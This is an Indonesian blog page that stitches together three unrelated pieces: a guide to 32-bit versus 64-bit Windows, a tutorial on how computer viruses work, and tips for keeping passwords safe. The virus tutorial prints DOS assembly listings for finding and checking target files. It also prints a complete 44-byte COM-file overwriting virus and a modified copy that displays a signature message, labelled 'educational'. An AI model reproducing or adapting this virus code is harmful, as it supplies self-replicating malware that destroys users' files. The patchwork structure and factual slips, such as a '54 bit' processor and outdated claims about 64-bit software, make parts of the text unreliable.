Di dunia komputer kita sering mendengar perkataan 32 dan 64 bit. Perkembangan teknologi sangat meningkat dengan pesat, belum lagi puas menikmati produk yang baru, sudah muncul produk yang lebih baru. Sekarang ini dikenal beberapa produk OS seperti
1. Windows Xp 32 bit
2. Windows Xp 64 bit
3. Windows Vista 32 Bit
4. Windows Vista 64 bit
5. Windows 7 32 bit
6. Windows 7 64 bit
7. Linux 32 bit atau 64 bit
Dalam dunia komputasi personal, 32-bit dan 64-bit mengacu pada jenis unit pengolahan pusat, sistem operasi, driver, program perangkat lunak, dll yang memanfaatkan bahwa arsitektur tertentu. 32-bit hardware dan software sering disebut sebagai x86 atau x86-32. hardware 64-bit dan software sering disebut sebagai x64 atau x86-64.
Banyak orang yang belum mengerti apakah itu perbedaan OS 32 bit dan 64 bit, mereka mendengar bahwa software os 64 bit lebih bagus dari 32 bit, dan mereka langsung membeli, tapi ketika mereka hendak menginstall di komputer mereka, ternyata os tersebut tidak bisa diinstall pada komputer mereka, mengapa??
Untuk memahami hal tersebut pada posting kali ini akan dibahas apa itu sebenarnya 32 bit dan 64 bit.
System 32-bit memanfaatkan data dalam potongan 32-bit sedangkan sistem 64-bit memanfaatkan data dalam potongan 64-bit. Secara umum, semakin banyak data yang dapat diolah sekaligus, sistem semakin cepat beroperasi. Ada beberapa keuntungan lainnya untuk sistem 64-bit juga, paling praktis untuk kemampuan menggunakan jumlah data yang secara signifikan lebih besar dari memori fisik.
Tetapi penggunaan software OS 32 bit dan Os 64 bit harus mengikuti hardware yang mendukung apakah komputer anda siap untuk menggunakan OS 64 bit atau hanya dapat menggunakan OS 32 bit saja. Kebanyakan prosesor lama saat didasarkan pada arsitektur 32-bit dan 32-bit tidak dapat menggunakan system OS 64 bit. Dengan perkembangan teknologi, saat ini banyak prosessor diciptakan pada arsitektur 64 bit dan mendukung sistem operasi. Prosesor ini juga sepenuhnya kompatibel dengan sistem operasi 32-bit.
Sedikit keterangan tentang processor 32 bit dengan 54 bit, pada dasarnya cara komputer menyimpan data atau membuat referensi untuk data, memori, dll dalam bentuk bit dengan nilai 1 atau 0, itu disebut “digit biner”. Jadi kode biner aliran 1 dan 0, seperti urutan acak 100100100111. Bit-bit ini juga menunjukkan bagaimana prosesor Anda melakukan perhitungan. Dengan menggunakan prosesor 32 bit Anda dapat mewakili nomor dari 0 sampai 4.294.967.295 sementara untuk processor 64-bit dapat mewakili angka 0 sampai 18.446.744.073.709.551.615.
Bagaimana anda mengetahui bahwa Windows anda bekerja untuk mesin 32 – atau mesin 64-bit?
Untuk Windows Vista dan Windows 7
Lakukan cara ini :
Metode 1: Melalui Control Panel
* Klik Start Tombol Start, Ketik system di kotak Start Search, kemudian klik system dalam daftar Program.
* Sistem operasi adalah ditampilkan sebagai berikut:
o Untuk versi system 64-bit: 64-bit Operating System muncul untuk Jenis Sistem di bawah Sistem.
o Untuk versi sistem operasi 32-bit: 32-bit Operating System muncul untuk Jenis Sistem di bawah Sistem.
Metode 2 : Dengan menggunakan System Informasi Windows
* Klik Start, ketik System pada kotak Start Search, lalu klik pilihan System Informasion
* Pilih System Summary pada panel pilihan, maka Operating system akan ditampilkan sebagai berikut
o Untuk Operating system 64 bit; tertulis, x64 bit-based PC untuk type system
o Untuk operating sytem 32 bit, tertulis x86-based PC untuk type system
Untuk Windows Xp
Metode 1 : System Properties dari Control panel
* Klik Start, kemudian klik Run
* Ketik sysdm.cpi, pada kotak text dan klik ok
* Klik tab General maka informasi tentang system operasi komputer anda akan tampil tulisan informasi :
o Untuk operating system versi 64-bit : Windows XP Professional x64 Edition Version < Tahun> akan tampil di bawah System.
o Untuk operating system versi 32-bit : Windows XP Professional Version
Metode 2 : Melihat System Informasi Windows
* Klik Start, kemudian klik Run
* Ketik perintah winmsd.exe, pada kotak teks kemudian klik Ok
* Klik peilihan System Summary pada panel navigasi, pada informasi kotak di sebelah kanan cari item Processor, maka bila tampil tulisan :
o X86, berarti komputer anda bekerja dengan windows 32 bit
o ia64 atau AMD64, berarti komputer anda bekerja pada windows 64 bit
Bagaimana anda mengetahui bahwa Motherboard anda dapat menggunakan Processor 64 bit
Metode 1 : Dari buku Manual
Saat anda membeli motherboard, disertakan buku manual, anda dapat melihat type soket processor dan bila di buku tersebut tertulis kompatibel untuk processor 64 bit maka anda dapat menggunakan processor 64 bit.
Metode 2 : Dengan menggunakan sorftware CPU Z
* Download Software CPU-Z
* Jalankan software terebut, lalu klik tab CPU
* Lihat pilihan “Package” atau instruction, contohnya akan terlihat processor MMX, SSE, SSE2, SSE3. x86-64, berarti Motherboard dan Processor anda support untuk 64 bit, bila hanya tulisan x86, berarti komputer anda tidak support untuk 64 bit
Manfaat sebenarnya dari mengatur ini tidak berasal dari jumlah bit, tetapi oleh struktur yang lebih baik dari sistem 64 bit dibanding dengan sistem 32 bit. Sebuah prosesor 64-bit yang dibuat dengan proses silikon yang lebih maju, memiliki transistor lebih banyak, dan kecepatan lebih cepat.
Adapun sistem operasi 64-bit dan perangkat lunak, sangat banyak, tetapi tidak ada yang dalam versi final. Microsoft telah merilis versi beta dari Windows XP dengan mengambil keuntungan dari teknologi 64 bit, tapi masih ada masalah. Masalahnya adalah ketika Anda menjalankan program perangkat lunak 32-bit dalam lingkungan sistem operasi 64-bit. Banyak program tidak akan bekerja dengan baik, seperti Adobe Acrobat dan Windows Media Player, misalnya. Masalah lain adalah RAM. Anda benar-benar membutuhkan sekitar 4 GB RAM untuk mendapatkan kemampuan yang penuh dari prosesor 64-bit, sedangkan pemilik PC yang memiliki memori yang kurang dari 1 GB disarankan tidak menggunakan system 64 bit.
Dengan mengetahui kemampuan komputer anda apakah menggunakan system 32 bit atau 64 bit, dan juga mengetahui apakah processor anda 32 bit atau 64 bit, maka anda tidak salah untuk memilih software yang disediakan seperti :
1. Sekarang setiap driver hardware terdiri dari 2 instaler system antara 32 bit atau 64 bit, dengan demikian anda dapat memilih driver yang sesuai dengan komputer anda.
2. Memilih OS atau CD OS, yang sesuai dengan kemampuan komputer anda.
3. Menginstall atau mencari, membeli software-software yang disesuaikan dengan kemampuan komputer anda.
1. Cara Kerja Virus Komputer
Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :
Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.
Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :
1.
Kemampuan mendapatkan informasi
2.
Kemampuan memeriksa program
3.
Kemampuan menggandakan diri / menularkan
4.
Kemampuan mengadakan manipulasi
5.
Kemampuan menyembunyikan diri sendiri
Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya
4. 1.1. Kemampuan mendapatkan Informasi
Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :
1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi
Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana
Besar_file_terinfeksi = file_asli + Virus_size
Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :
Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file
———
int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi
je exit ; kalau tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; akhir kode Virus
Listing 1. Search First File
Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.
4. 1. 2. Kemampuan Untuk Memeriksa Program
Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :
Gambar 2. Memeriksa Program
Berikut ini contoh listing dari kemampuan untuk memeriksa file
Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file : ; bagian penginfeksian
———— ; rutin infeksi
int 20h ; Dos Exit function
nop ; No Operation
Listing 2 . Periksa File
Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows
Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.
4. 1. 3. Kemampuan untuk menggandakan diri / Replicating
kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.
File bersih program Virus
Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.
Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
Berikut ini listing dari 44-Virus.Asm :
virus segment
org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h ; Akhir badan virus “V2″
virus ends
end start
Listing 4.3. Replicating / Penggandaan
4. 1. 4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
1.
Menampilkan tulisan / kata-kata / gambar
2.
Membunyikan port speaker
3.
Time bomb / logic Bomb
4.1.4.1. Menampilkan Tulisan / gambar
Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.
virus segment
org 100h
assume cs:virus
len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h ; Akhir badan virus “V2″
virus ends
end start
Listing. 4.4. Rutin Cetak String
Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :
Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –
setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
Password merupakan kode-kode rahasia yang harus dijaga keamanannya. Banyak hal negatif yang dapat terjadi ketika password Anda bocor ke tangan orang lain. Simak 7 kiat singkat untuk menjaganya.
1. Tidak Menggunakan Default Password
Default password adalah password yang kita dapat pertama kali. Password standar ini sebaiknya memang harus cepat diganti lantaran sangat rentan. Pasalnya, default password dapat dicari dengan mudah di google search, bahkan di situ tercantum nama mesin, type dan default password terpampang dengan megah di beberapa situs vendor pembuatnya.
Terkadang administrator takut lupa dengan mengubah-ubah default password yang ada, sehingga seorang penyusup dapat mengambil alih sistem dengan default password.
2.Tidak Memakai Password Hint
Terkadang kita takut lupa dengan password yang sudah kita entry ke dalam sistem/account, sehingga kita perlu membuat sebuah pengingat bila kita lupa dengan password tersebut. Nah pengingat ini disebut password Hint, bila kita membuat pertanyaan dengan password hint ini maka dengan cepat kita dapat mengingat kembali password yang lupa tersebut.
Begitu juga dengan para hacker, mereka akan mencoba-coba dengan menebak password kita dengan berbagai pertanyaan di password hint, lama kelamaan password tersebut akan tertebak, bila pertanyaan yang tertera di password hint dapat dijawab oleh si penebak password.
3.Tidak Menuliskan Password
Pemilik password sering kali takut lupa dengan password yang telah dimasukkan, sehingga pemilik password akan menuliskan berbagai user id dan passwordnya ke dalam media lain seperti notebook, notepad, stickies (mac), password folder, buku, handphone dan lainnya.
Hal ini juga cukup rentan bocor. Mengapa rentan? Karena bila berbagai peralatan tersebut hilang, maka semua informasi tentang user id dan password tersebut cepat atau lambat akan diketahui oleh si pencuri peralatan/gadget yang hilang.
4.Menggunakan Password yang Kuat
Pemilik password seringkali menggunakan password yang pendek saja, kalau saja bisa lebih pendek dari 3 character maka user tersebut akan memberikan password yang pendek. Untung saja saat ini sistem memberikan panjang password minimal 6 karakter dan maksimal 254 karakter. Semakin panjang sebuah password maka akan semakin kuat keamanan password tersebut.
Password yang kuat dapat dibuat dengan kombinasi angka dan huruf bahkan berbagai karakter yang lain. Beberapa admin saat ini menggunakan password yang cukup panjang, ditambah dengan enkripsi seperti PGP key dan lainnya, sehingga cukup sulit untuk dapat menebak password tersebut.
5.Sering Mengubah Password
Pemilik password sebaiknya secara berkala mengubah password untuk autentikasi tersebut, semakin sering password berubah semakin baik, karena semakin sulit si penebak password menjebol account/system kita. Perubahan terhadap password tergantung si pemilik, bisa seminggu, sebulan, tiga bulan sekali dan lainnya. Asal si pemilik tidak lupa dengan password yang sudah diubah tadi.
6.Tidak Memakai Password Sama pada Beberapa Account
Pemilik password kadang sering lupa dan sering membuat account yang cukup banyak, sehingga mereka setiap membuat account baru menggunakan user id yang sama dan password yang sama, ini sangat rentan dan bahaya. Karena satu account tembus password ini, maka semua account akan dapat diambil oleh hacker tersebut.
7. Menggunakan Manajemen Password
Untuk membantu mengingatkan kembali berbagai password dan berbagai account, seringkali kita sangat kesulitan, tapi tidak perlu khawatir karena sudah banyak saat ini aplikasi untuk membantu menata password kita. Aplikasi ini dapat didownload secara gratis dari internet maupun berbayar, sehingga berapapun account kita dan berapapun password kita dapat dengan mudah untuk diingat dan dibuka kembali, tentu saja untuk membukanya dengan metode enkripsi juga.
*) Penulis adalah IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII sekaligus Dosen Keamanan Jaringan dan Cybercrime. www[dot]detik[dot]com
search this blog
About Me
- Fashah Blog
- saya sangat suka olahraga, scient, and religion Informasi lebih lanjut hubungi 083873659736